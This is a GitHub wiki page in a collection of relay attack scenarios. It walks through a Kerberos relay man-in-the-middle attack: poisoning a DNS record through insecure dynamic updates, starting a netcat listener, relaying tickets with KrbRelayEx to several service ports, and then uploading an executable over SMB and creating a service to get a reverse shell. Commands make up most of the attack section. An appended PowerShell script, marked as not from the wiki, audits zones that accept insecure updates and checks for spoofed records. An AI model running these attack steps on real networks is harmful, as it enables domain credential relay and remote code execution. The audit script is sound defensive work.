MITM Kerberos relay RPC - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://www.youtube.com/watch?v=fUqCL_NtVAo

Tools:

- KrbRelayEx-RPC
- adddns

KrbRelayEx-RPC is a tool designed to perform Man-in-the-Middle (MitM) attacks by relaying Kerberos AP-REQ tickets.

Attacker IP: 192.168.212.11

1. Check whether any DNS zones have insecure (nonsecure) dynamic updates enabled.

2. Set up the fake RPC server and wait for the event.

```bash
# replace the DNS record using insecure dynamic updates (if enabled)
python3 adddns.py --domain MYLAB.LOCAL --dnsip 192.168.212.21 --hostip 192.168.212.11 --hostname ADCS-MYLAB

# prepare listener
nc -nlvp 12345

# start the relay tool; 192.168.212.43 is the relay target
sudo dotnet ./KrbRelayEx.dll -spn cifs/adcs-mylab.mylab.local -console -redirecthost 192.168.212.43 -redirectports 445,3389,80,443,1433,5985
```
3. When the event fires and we get an interactive shell:

```
use c$
put /home/andrea/s.exe temp\s.exe
service-create tamarro c:\temp\s.exe
# get reverse shell
```
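A defender-side check for the precondition in step 1, added here as an example and not part of this wiki or the KrbRelayEx project. It assumes the DnsServer PowerShell module (run on the DNS server or with RSAT), uses the zone and host names from the page, and the expected address of ADCS-MYLAB is a placeholder you must replace.

```powershell
# Added audit script (not from the wiki). Lists zones that accept nonsecure dynamic
# updates (the precondition the attack relies on) and verifies that the host the
# relay impersonates still resolves to its legitimate address.
Import-Module DnsServer

function Get-InsecureUpdateZones {
    # Primary zones with DynamicUpdate = NonsecureAndSecure accept unauthenticated record
    # changes. 'Secure' (Kerberos-authenticated) is only available for AD-integrated zones.
    Get-DnsServerZone |
        Where-Object { $_.ZoneType -eq 'Primary' -and -not $_.IsAutoCreated -and
                       $_.DynamicUpdate -eq 'NonsecureAndSecure' } |
        Select-Object ZoneName, IsDsIntegrated, DynamicUpdate
}

function Test-ExpectedARecord {
    param(
        [string]$ZoneName,    # e.g. MYLAB.LOCAL
        [string]$HostName,    # e.g. ADCS-MYLAB
        [string]$ExpectedIP   # the legitimate address of that host
    )
    $records = Get-DnsServerResourceRecord -ZoneName $ZoneName -Name $HostName -RRType A `
                                           -ErrorAction SilentlyContinue
    $ok = $true
    foreach ($r in $records) {
        $ip = $r.RecordData.IPv4Address.IPAddressToString
        if ($ip -ne $ExpectedIP) {
            # An unexpected address on a host like ADCS is the footprint of a spoofed update.
            Write-Warning "$HostName.$ZoneName resolves to $ip, expected $ExpectedIP"
            $ok = $false
        }
    }
    return ($ok -and $records)
}

# Report zones that allow insecure updates.
Get-InsecureUpdateZones | Format-Table -AutoSize

# Placeholder: replace with the real address of ADCS-MYLAB before use.
$expectedAdcsIp = '<real ADCS-MYLAB IP>'
Test-ExpectedARecord -ZoneName 'MYLAB.LOCAL' -HostName 'ADCS-MYLAB' -ExpectedIP $expectedAdcsIp

# Remediation for AD-integrated zones found above (uncomment to apply):
# Get-InsecureUpdateZones | Where-Object IsDsIntegrated |
#     ForEach-Object { Set-DnsServerPrimaryZone -Name $_.ZoneName -DynamicUpdate Secure }
```

Zones that are not AD-integrated cannot be set to Secure; for those, disable dynamic updates (DynamicUpdate None) or convert the zone to AD-integrated first.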